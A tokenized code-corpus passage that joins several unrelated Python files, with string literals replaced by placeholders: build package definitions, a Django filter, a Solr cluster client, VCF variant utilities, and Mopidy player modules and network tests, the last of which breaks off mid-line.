<s> class IntltoolPackage ( Package ) : <EOL> def __init__ ( self ) : <EOL> Package . __init__ ( self , '<STR_LIT>' , '<STR_LIT>' , <EOL> sources = [ <EOL> '<STR_LIT>' <EOL> ] <EOL> ) <EOL> IntltoolPackage ( ) </s>
<s> class LibvorbisPackage ( XiphPackage ) : <EOL> def __init__ ( self ) : <EOL> XiphPackage . __init__ ( self , <EOL> project = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' ) <EOL> self . configure = '<STR_LIT>' <EOL> self . sources . append ( '<STR_LIT>' ) <EOL> def prep ( self ) : <EOL> Package . prep ( self ) <EOL> self . sh ( '<STR_LIT>' ) <EOL> LibvorbisPackage ( ) </s>
<s> class WebkitPackage ( Package ) : <EOL> def __init__ ( self ) : <EOL> Package . __init__ ( self , '<STR_LIT>' , '<STR_LIT>' , <EOL> sources = [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> configure_flags = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> if Package . profile . name == '<STR_LIT>' : <EOL> self . configure_flags . extend ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] ) <EOL> self . sources . extend ( [ <EOL> '<STR_LIT>' <EOL> ] ) <EOL> def prep ( self ) : <EOL> Package . prep ( self ) <EOL> if Package . profile . name == '<STR_LIT>' : <EOL> for p in range ( <NUM_LIT:1> , len ( self . sources ) ) : <EOL> self . sh ( '<STR_LIT>' + str ( p ) + '<STR_LIT>' ) <EOL> WebkitPackage ( ) </s>
<s> '''<STR_LIT>''' <EOL> from django import template <EOL> register = template . Library ( ) <EOL> @ register . filter <EOL> def in_list ( value , arg ) : <EOL> '''<STR_LIT>''' <EOL> return value in arg </s>
<s> import json <EOL> import logging <EOL> from . transport import TransportRequests <EOL> from . schema import Schema <EOL> from . exceptions import * <EOL> from . solrresp import SolrResponse <EOL> from collections import defaultdict <EOL> class Collections ( ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , solr , log ) : <EOL> self . solr = solr <EOL> self . logger = log <EOL> def api ( self , action , args = { } ) : <EOL> '''<STR_LIT>''' <EOL> args [ '<STR_LIT:action>' ] = action . upper ( ) <EOL> res , con_info = self . solr . transport . send_request ( endpoint = '<STR_LIT>' , params = args ) <EOL> if '<STR_LIT>' in res and res [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] == <NUM_LIT:0> : <EOL> return res , con_info <EOL> else : <EOL> raise SolrError ( "<STR_LIT>" . format ( con_info , res ) ) <EOL> def clusterstatus ( self ) : <EOL> '''<STR_LIT>''' <EOL> res , con_info = self . api ( '<STR_LIT>' ) <EOL> cluster = res [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> out = { } <EOL> try : <EOL> for collection in cluster : <EOL> out [ collection ] = { } <EOL> for shard in cluster [ collection ] [ '<STR_LIT>' ] : <EOL> out [ collection ] [ shard ] = { } <EOL> for replica in cluster [ collection ] [ '<STR_LIT>' ] [ shard ] [ '<STR_LIT>' ] : <EOL> out [ collection ] [ shard ] [ replica ] = cluster [ collection ] [ '<STR_LIT>' ] [ shard ] [ '<STR_LIT>' ] [ replica ] <EOL> if out [ collection ] [ shard ] [ replica ] [ '<STR_LIT:state>' ] != '<STR_LIT>' : <EOL> self . logger . error ( "<STR_LIT>" . format ( collection , shard , replica ) ) <EOL> except Exception as e : <EOL> self . logger . error ( "<STR_LIT>" ) <EOL> self . logger . exception ( e ) <EOL> return out <EOL> def _for_core ( self , cluster_resp = None ) : <EOL> if cluster_resp is None : <EOL> cluster_resp = self . 
clusterstatus ( ) <EOL> for collection in cluster_resp : <EOL> for shard in cluster_resp [ collection ] : <EOL> for core in cluster_resp [ collection ] [ shard ] : <EOL> yield collection , shard , core , cluster_resp [ collection ] [ shard ] [ core ] <EOL> def _for_shard ( self , cluster_resp = None ) : <EOL> if cluster_resp is None : <EOL> cluster_resp = self . clusterstatus ( ) <EOL> for collection in cluster_resp : <EOL> for shard in cluster_resp [ collection ] : <EOL> yield collection , shard , cluster_resp [ collection ] [ shard ] <EOL> def _check_collection ( self , collection , cluster_resp = None ) : <EOL> for coll , shard , core , c_data in self . _for_core ( cluster_resp ) : <EOL> if collection == coll : <EOL> if c_data [ '<STR_LIT:state>' ] != '<STR_LIT>' : <EOL> return False <EOL> return True <EOL> self . logger . error ( "<STR_LIT>" . format ( collection ) ) <EOL> def get_collection_counts ( self , cluster_resp = None ) : <EOL> '''<STR_LIT>''' <EOL> from SolrClient import SolrClient <EOL> temp = { } <EOL> for coll , shard , core , c_data in self . _for_core ( cluster_resp ) : <EOL> if coll not in temp : <EOL> temp [ coll ] = { } <EOL> if shard not in temp [ coll ] : <EOL> temp [ coll ] [ shard ] = { } <EOL> ts = SolrClient ( c_data [ '<STR_LIT>' ] ) <EOL> temp [ coll ] [ shard ] [ c_data [ '<STR_LIT>' ] ] = ts . query ( c_data [ '<STR_LIT>' ] , <EOL> { '<STR_LIT:q>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT:false>' , <EOL> } ) . get_num_found ( ) <EOL> return temp <EOL> def check_collection_counts ( self , counts = None , cb = None ) : <EOL> if counts is None : <EOL> counts = self . get_collection_counts ( ) <EOL> for collection , shard , s_data in self . _for_shard ( counts ) : <EOL> for replica in s_data : <EOL> self . logger . info ( "<STR_LIT>" . format ( collection , shard , replica , s_data [ replica ] ) ) <EOL> if len ( set ( s_data . values ( ) ) ) > <NUM_LIT:1> : <EOL> self . logger . error ( "<STR_LIT>" . 
format ( collection , shard , replica , "<STR_LIT:/>" . join ( [ str ( x ) for x in list ( s_data . values ( ) ) ] ) ) ) <EOL> if cb : <EOL> if hasattr ( cb , '<STR_LIT>' ) : <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> cb ( s_data ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> return counts <EOL> def check_collections ( self , collection = None ) : <EOL> cluster = self . clusterstatus ( ) <EOL> out = { } <EOL> for coll in cluster . keys ( ) : <EOL> out [ coll ] = self . _check_collection ( coll , cluster ) <EOL> self . logger . info ( "<STR_LIT>" . format ( coll , "<STR_LIT>" if out [ coll ] else "<STR_LIT>" ) ) <EOL> return out </s>
<s> from __future__ import absolute_import <EOL> from . make_haploblocks import get_haploblocks <EOL> from . genetic_models import check_genetic_models <EOL> from . model_score import get_model_score <EOL> from . fix_variant import make_print_version <EOL> from . variant_annotator import VariantAnnotator </s>
<s> """<STR_LIT>""" <EOL> import string <EOL> import logging <EOL> logging = logging . getLogger ( __name__ ) <EOL> def get_variant_dict ( variant_line , header_line ) : <EOL> """<STR_LIT>""" <EOL> return dict ( zip ( header_line , variant_line . rstrip ( ) . split ( '<STR_LIT:\t>' ) ) ) <EOL> def get_info_dict ( info_line ) : <EOL> """<STR_LIT>""" <EOL> variant_info = { } <EOL> for raw_info in info_line . split ( '<STR_LIT:;>' ) : <EOL> splitted_info = raw_info . split ( '<STR_LIT:=>' ) <EOL> if len ( splitted_info ) == <NUM_LIT:2> : <EOL> variant_info [ splitted_info [ <NUM_LIT:0> ] ] = splitted_info [ <NUM_LIT:1> ] <EOL> else : <EOL> variant_info [ splitted_info [ <NUM_LIT:0> ] ] = [ ] <EOL> return variant_info <EOL> def get_variant_id ( variant_dict ) : <EOL> """<STR_LIT>""" <EOL> chrom = variant_dict [ '<STR_LIT>' ] <EOL> pos = variant_dict [ '<STR_LIT>' ] <EOL> ref = variant_dict [ '<STR_LIT>' ] <EOL> bad_chars = "<STR_LIT>" <EOL> alt = '<STR_LIT>' . join ( c for c in variant_dict [ '<STR_LIT>' ] if c not in bad_chars ) <EOL> return '<STR_LIT:_>' . join ( [ chrom , pos , ref , alt ] ) <EOL> def get_vep_dict ( vep_string , vep_header , allele = None ) : <EOL> """<STR_LIT>""" <EOL> vep_dict = { } <EOL> for vep_annotation in vep_string . split ( '<STR_LIT:U+002C>' ) : <EOL> inner_dict = dict ( zip ( vep_header , vep_annotation . split ( '<STR_LIT:|>' ) ) ) <EOL> if '<STR_LIT>' in inner_dict : <EOL> allele = inner_dict [ '<STR_LIT>' ] <EOL> if allele in vep_dict : <EOL> vep_dict [ allele ] . append ( inner_dict ) <EOL> else : <EOL> vep_dict [ allele ] = [ inner_dict ] <EOL> return vep_dict </s>
<s> from tempfile import NamedTemporaryFile <EOL> from multiprocessing import Manager <EOL> from collections import OrderedDict <EOL> from genmod . utils import VariantPrinter <EOL> from genmod . vcf_tools import ( get_variant_dict , get_info_dict , <EOL> get_variant_id , HeaderParser ) <EOL> def setup_vcf_file ( ) : <EOL> """<STR_LIT>""" <EOL> vcf_lines = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' '<STR_LIT>' , <EOL> '<STR_LIT>' '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> vcf_file = NamedTemporaryFile ( mode = '<STR_LIT>' , delete = False , suffix = '<STR_LIT>' ) <EOL> vcf_file . writelines ( vcf_lines ) <EOL> vcf_file . seek ( <NUM_LIT:0> ) <EOL> vcf_file . close ( ) <EOL> return vcf_file . name <EOL> def test_variant_printer ( ) : <EOL> """<STR_LIT>""" <EOL> vcf_file = setup_vcf_file ( ) <EOL> variant_queue = Manager ( ) . Queue ( ) <EOL> head = HeaderParser ( ) <EOL> outfile = NamedTemporaryFile ( mode = '<STR_LIT>' , delete = False , suffix = '<STR_LIT>' ) <EOL> outfile . close ( ) <EOL> variant_printer = VariantPrinter ( <EOL> task_queue = variant_queue , <EOL> head = head , <EOL> mode = '<STR_LIT>' , <EOL> outfile = outfile . name <EOL> ) <EOL> variant_printer . start ( ) <EOL> batch = OrderedDict ( ) <EOL> for line in open ( vcf_file ) : <EOL> line = line . rstrip ( ) <EOL> if line . startswith ( '<STR_LIT:#>' ) : <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> head . parse_meta_data ( line ) <EOL> else : <EOL> head . parse_header_line ( line ) <EOL> else : <EOL> variant_dict = get_variant_dict ( line , head . header ) <EOL> print ( variant_dict ) <EOL> variant_id = get_variant_id ( variant_dict ) <EOL> variant_dict [ '<STR_LIT>' ] = variant_id <EOL> variant_dict [ '<STR_LIT>' ] = get_info_dict ( variant_dict [ '<STR_LIT>' ] ) <EOL> variant_queue . 
put ( variant_dict ) <EOL> variant_queue . put ( None ) <EOL> variant_printer . join ( ) <EOL> variants = [ ] <EOL> with open ( outfile . name , '<STR_LIT:r>' ) as f : <EOL> for line in f : <EOL> variants . append ( line . rstrip ( ) . split ( '<STR_LIT:\t>' ) ) <EOL> assert variants [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:1>' <EOL> assert variants [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] == '<STR_LIT>' </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import copy <EOL> import logging <EOL> import time <EOL> from mopidy import models <EOL> logger = logging . getLogger ( __name__ ) <EOL> class HistoryController ( object ) : <EOL> pykka_traversable = True <EOL> def __init__ ( self ) : <EOL> self . _history = [ ] <EOL> def _add_track ( self , track ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( track , models . Track ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> timestamp = int ( time . time ( ) * <NUM_LIT:1000> ) <EOL> name_parts = [ ] <EOL> if track . artists : <EOL> name_parts . append ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ artist . name for artist in track . artists ] ) ) <EOL> if track . name is not None : <EOL> name_parts . append ( track . name ) <EOL> name = '<STR_LIT>' . join ( name_parts ) <EOL> ref = models . Ref . track ( uri = track . uri , name = name ) <EOL> self . _history . insert ( <NUM_LIT:0> , ( timestamp , ref ) ) <EOL> def get_length ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . _history ) <EOL> def get_history ( self ) : <EOL> """<STR_LIT>""" <EOL> return copy . copy ( self . _history ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import logging <EOL> import threading <EOL> import pykka <EOL> from mopidy . compat import thread <EOL> logger = logging . getLogger ( __name__ ) <EOL> def exit_process ( ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> thread . interrupt_main ( ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> def sigterm_handler ( signum , frame ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> exit_process ( ) <EOL> def stop_actors_by_class ( klass ) : <EOL> actors = pykka . ActorRegistry . get_by_class ( klass ) <EOL> logger . debug ( '<STR_LIT>' , len ( actors ) , klass . __name__ ) <EOL> for actor in actors : <EOL> actor . stop ( ) <EOL> def stop_remaining_actors ( ) : <EOL> num_actors = len ( pykka . ActorRegistry . get_all ( ) ) <EOL> while num_actors : <EOL> logger . error ( <EOL> '<STR_LIT>' ) <EOL> logger . debug ( <EOL> '<STR_LIT>' , <EOL> num_actors , threading . active_count ( ) - num_actors , <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ t . name for t in threading . enumerate ( ) ] ) ) <EOL> logger . debug ( '<STR_LIT>' , num_actors ) <EOL> pykka . ActorRegistry . stop_all ( ) <EOL> num_actors = len ( pykka . ActorRegistry . get_all ( ) ) <EOL> logger . debug ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , unicode_literals <EOL> import inspect <EOL> from mopidy . mpd import exceptions <EOL> ENCODING = '<STR_LIT>' <EOL> LINE_TERMINATOR = '<STR_LIT:\n>' <EOL> VERSION = '<STR_LIT>' <EOL> def load_protocol_modules ( ) : <EOL> """<STR_LIT>""" <EOL> from . import ( <EOL> audio_output , channels , command_list , connection , current_playlist , <EOL> mount , music_db , playback , reflection , status , stickers , <EOL> stored_playlists ) <EOL> def INT ( value ) : <EOL> """<STR_LIT>""" <EOL> if value is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return int ( value ) <EOL> def UINT ( value ) : <EOL> """<STR_LIT>""" <EOL> if value is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not value . isdigit ( ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return int ( value ) <EOL> def BOOL ( value ) : <EOL> """<STR_LIT>""" <EOL> if value in ( '<STR_LIT:1>' , '<STR_LIT:0>' ) : <EOL> return bool ( int ( value ) ) <EOL> raise ValueError ( '<STR_LIT>' % value ) <EOL> def RANGE ( value ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT::>' in value : <EOL> start , stop = value . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> start = UINT ( start ) <EOL> if stop . strip ( ) : <EOL> stop = UINT ( stop ) <EOL> if start >= stop : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> else : <EOL> stop = None <EOL> else : <EOL> start = UINT ( value ) <EOL> stop = start + <NUM_LIT:1> <EOL> return slice ( start , stop ) <EOL> class Commands ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . handlers = { } <EOL> def add ( self , name , auth_required = True , list_command = True , ** validators ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( func ) : <EOL> if name in self . handlers : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> args , varargs , keywords , defaults = inspect . 
getargspec ( func ) <EOL> defaults = dict ( zip ( args [ - len ( defaults or [ ] ) : ] , defaults or [ ] ) ) <EOL> if not args and not varargs : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if len ( args ) > <NUM_LIT:1> and varargs : <EOL> raise TypeError ( <EOL> '<STR_LIT>' ) <EOL> if not set ( validators . keys ( ) ) . issubset ( args ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if keywords : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> def validate ( * args , ** kwargs ) : <EOL> if varargs : <EOL> return func ( * args , ** kwargs ) <EOL> try : <EOL> callargs = inspect . getcallargs ( func , * args , ** kwargs ) <EOL> except TypeError : <EOL> raise exceptions . MpdArgError ( <EOL> '<STR_LIT>' % name ) <EOL> for key , value in callargs . items ( ) : <EOL> default = defaults . get ( key , object ( ) ) <EOL> if key in validators and value != default : <EOL> try : <EOL> callargs [ key ] = validators [ key ] ( value ) <EOL> except ValueError : <EOL> raise exceptions . MpdArgError ( '<STR_LIT>' ) <EOL> return func ( ** callargs ) <EOL> validate . auth_required = auth_required <EOL> validate . list_command = list_command <EOL> self . handlers [ name ] = validate <EOL> return func <EOL> return wrapper <EOL> def call ( self , tokens , context = None ) : <EOL> """<STR_LIT>""" <EOL> if not tokens : <EOL> raise exceptions . MpdNoCommand ( ) <EOL> if tokens [ <NUM_LIT:0> ] not in self . handlers : <EOL> raise exceptions . MpdUnknownCommand ( command = tokens [ <NUM_LIT:0> ] ) <EOL> return self . handlers [ tokens [ <NUM_LIT:0> ] ] ( context , * tokens [ <NUM_LIT:1> : ] ) <EOL> commands = Commands ( ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import os <EOL> import unittest <EOL> from mopidy import exceptions <EOL> from mopidy . audio import scan <EOL> from mopidy . internal import path as path_lib <EOL> from tests import path_to_data_dir <EOL> class ScannerTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . errors = { } <EOL> self . result = { } <EOL> def find ( self , path ) : <EOL> media_dir = path_to_data_dir ( path ) <EOL> result , errors = path_lib . find_mtimes ( media_dir ) <EOL> for path in result : <EOL> yield os . path . join ( media_dir , path ) <EOL> def scan ( self , paths ) : <EOL> scanner = scan . Scanner ( ) <EOL> for path in paths : <EOL> uri = path_lib . path_to_uri ( path ) <EOL> key = uri [ len ( '<STR_LIT>' ) : ] <EOL> try : <EOL> self . result [ key ] = scanner . scan ( uri ) <EOL> except exceptions . ScannerError as error : <EOL> self . errors [ key ] = error <EOL> def check ( self , name , key , value ) : <EOL> name = path_to_data_dir ( name ) <EOL> self . assertEqual ( self . result [ name ] . tags [ key ] , value ) <EOL> def check_if_missing_plugin ( self ) : <EOL> for path , result in self . result . items ( ) : <EOL> if not path . endswith ( '<STR_LIT>' ) : <EOL> continue <EOL> if not result . playable and result . mime == '<STR_LIT>' : <EOL> raise unittest . SkipTest ( '<STR_LIT>' ) <EOL> def test_tags_is_set ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . assert_ ( self . result . values ( ) [ <NUM_LIT:0> ] . tags ) <EOL> def test_errors_is_not_set ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . check_if_missing_plugin ( ) <EOL> self . assert_ ( not self . errors ) <EOL> def test_duration_is_set ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . check_if_missing_plugin ( ) <EOL> ogg = path_to_data_dir ( '<STR_LIT>' ) <EOL> mp3 = path_to_data_dir ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . result [ mp3 ] . 
duration , <NUM_LIT> ) <EOL> self . assertEqual ( self . result [ ogg ] . duration , <NUM_LIT> ) <EOL> def test_artist_is_set ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . check_if_missing_plugin ( ) <EOL> self . check ( '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT:name>' ] ) <EOL> self . check ( '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT:name>' ] ) <EOL> def test_album_is_set ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . check_if_missing_plugin ( ) <EOL> self . check ( '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> self . check ( '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def test_track_is_set ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . check_if_missing_plugin ( ) <EOL> self . check ( '<STR_LIT>' , '<STR_LIT:title>' , [ '<STR_LIT>' ] ) <EOL> self . check ( '<STR_LIT>' , '<STR_LIT:title>' , [ '<STR_LIT>' ] ) <EOL> def test_nonexistant_dir_does_not_fail ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . assert_ ( not self . errors ) <EOL> def test_other_media_is_ignored ( self ) : <EOL> self . scan ( self . find ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( self . result . values ( ) [ <NUM_LIT:0> ] . playable ) <EOL> def test_log_file_that_gst_thinks_is_mpeg_1_is_ignored ( self ) : <EOL> self . scan ( [ path_to_data_dir ( '<STR_LIT>' ) ] ) <EOL> self . check_if_missing_plugin ( ) <EOL> log = path_to_data_dir ( '<STR_LIT>' ) <EOL> self . assertLess ( self . result [ log ] . duration , <NUM_LIT:100> ) <EOL> def test_empty_wav_file ( self ) : <EOL> self . scan ( [ path_to_data_dir ( '<STR_LIT>' ) ] ) <EOL> wav = path_to_data_dir ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . result [ wav ] . duration , <NUM_LIT:0> ) <EOL> def test_uri_list ( self ) : <EOL> path = path_to_data_dir ( '<STR_LIT>' ) <EOL> self . scan ( [ path ] ) <EOL> self . assertEqual ( self . result [ path ] . 
mime , '<STR_LIT>' ) <EOL> def test_text_plain ( self ) : <EOL> path = path_to_data_dir ( '<STR_LIT>' ) <EOL> self . scan ( [ path ] ) <EOL> self . assertIn ( path , self . errors ) <EOL> @ unittest . SkipTest <EOL> def test_song_without_time_is_handeled ( self ) : <EOL> pass </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import errno <EOL> import logging <EOL> import socket <EOL> import unittest <EOL> from mock import Mock , call , patch , sentinel <EOL> import pykka <EOL> from mopidy . internal import network <EOL> from mopidy . internal . gi import GObject <EOL> from tests import any_int , any_unicode <EOL> class ConnectionTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . mock = Mock ( spec = network . Connection ) <EOL> def test_init_ensure_nonblocking_io ( self ) : <EOL> sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . __init__ ( <EOL> self . mock , Mock ( ) , { } , sock , ( sentinel . host , sentinel . port ) , <EOL> sentinel . timeout ) <EOL> sock . setblocking . assert_called_once_with ( False ) <EOL> def test_init_starts_actor ( self ) : <EOL> protocol = Mock ( spec = network . LineProtocol ) <EOL> network . Connection . __init__ ( <EOL> self . mock , protocol , { } , Mock ( ) , ( sentinel . host , sentinel . port ) , <EOL> sentinel . timeout ) <EOL> protocol . start . assert_called_once_with ( self . mock ) <EOL> def test_init_enables_recv_and_timeout ( self ) : <EOL> network . Connection . __init__ ( <EOL> self . mock , Mock ( ) , { } , Mock ( ) , ( sentinel . host , sentinel . port ) , <EOL> sentinel . timeout ) <EOL> self . mock . enable_recv . assert_called_once_with ( ) <EOL> self . mock . enable_timeout . assert_called_once_with ( ) <EOL> def test_init_stores_values_in_attributes ( self ) : <EOL> addr = ( sentinel . host , sentinel . port ) <EOL> protocol = Mock ( spec = network . LineProtocol ) <EOL> protocol_kwargs = { } <EOL> sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . __init__ ( <EOL> self . mock , protocol , protocol_kwargs , sock , addr , sentinel . timeout ) <EOL> self . assertEqual ( sock , self . mock . sock ) <EOL> self . assertEqual ( protocol , self . mock . protocol ) <EOL> self . 
assertEqual ( protocol_kwargs , self . mock . protocol_kwargs ) <EOL> self . assertEqual ( sentinel . timeout , self . mock . timeout ) <EOL> self . assertEqual ( sentinel . host , self . mock . host ) <EOL> self . assertEqual ( sentinel . port , self . mock . port ) <EOL> def test_init_handles_ipv6_addr ( self ) : <EOL> addr = ( <EOL> sentinel . host , sentinel . port , sentinel . flowinfo , sentinel . scopeid ) <EOL> protocol = Mock ( spec = network . LineProtocol ) <EOL> protocol_kwargs = { } <EOL> sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . __init__ ( <EOL> self . mock , protocol , protocol_kwargs , sock , addr , sentinel . timeout ) <EOL> self . assertEqual ( sentinel . host , self . mock . host ) <EOL> self . assertEqual ( sentinel . port , self . mock . port ) <EOL> def test_stop_disables_recv_send_and_timeout ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . mock . disable_timeout . assert_called_once_with ( ) <EOL> self . mock . disable_recv . assert_called_once_with ( ) <EOL> self . mock . disable_send . assert_called_once_with ( ) <EOL> def test_stop_closes_socket ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . mock . sock . close . assert_called_once_with ( ) <EOL> def test_stop_closes_socket_error ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . close . side_effect = socket . error <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . mock . sock . close . 
assert_called_once_with ( ) <EOL> def test_stop_stops_actor ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . mock . actor_ref . stop . assert_called_once_with ( block = False ) <EOL> def test_stop_handles_actor_already_being_stopped ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . actor_ref . stop . side_effect = pykka . ActorDeadError ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . mock . actor_ref . stop . assert_called_once_with ( block = False ) <EOL> def test_stop_sets_stopping_to_true ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . assertEqual ( True , self . mock . stopping ) <EOL> def test_stop_does_not_proceed_when_already_stopping ( self ) : <EOL> self . mock . stopping = True <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . actor_ref . stop . call_count ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . sock . close . call_count ) <EOL> @ patch . object ( network . logger , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_stop_logs_reason ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> network . logger . log . assert_called_once_with ( <EOL> logging . DEBUG , sentinel . 
reason ) <EOL> @ patch . object ( network . logger , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_stop_logs_reason_with_level ( self ) : <EOL> self . mock . stopping = False <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( <EOL> self . mock , sentinel . reason , level = sentinel . level ) <EOL> network . logger . log . assert_called_once_with ( <EOL> sentinel . level , sentinel . reason ) <EOL> @ patch . object ( network . logger , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_stop_logs_that_it_is_calling_itself ( self ) : <EOL> self . mock . stopping = True <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . stop ( self . mock , sentinel . reason ) <EOL> network . logger . log ( any_int , any_unicode ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_recv_registers_with_gobject ( self ) : <EOL> self . mock . recv_id = None <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . fileno . return_value = sentinel . fileno <EOL> GObject . io_add_watch . return_value = sentinel . tag <EOL> network . Connection . enable_recv ( self . mock ) <EOL> GObject . io_add_watch . assert_called_once_with ( <EOL> sentinel . fileno , <EOL> GObject . IO_IN | GObject . IO_ERR | GObject . IO_HUP , <EOL> self . mock . recv_callback ) <EOL> self . assertEqual ( sentinel . tag , self . mock . recv_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_recv_already_registered ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . recv_id = sentinel . tag <EOL> network . Connection . enable_recv ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . io_add_watch . call_count ) <EOL> def test_enable_recv_does_not_change_tag ( self ) : <EOL> self . mock . 
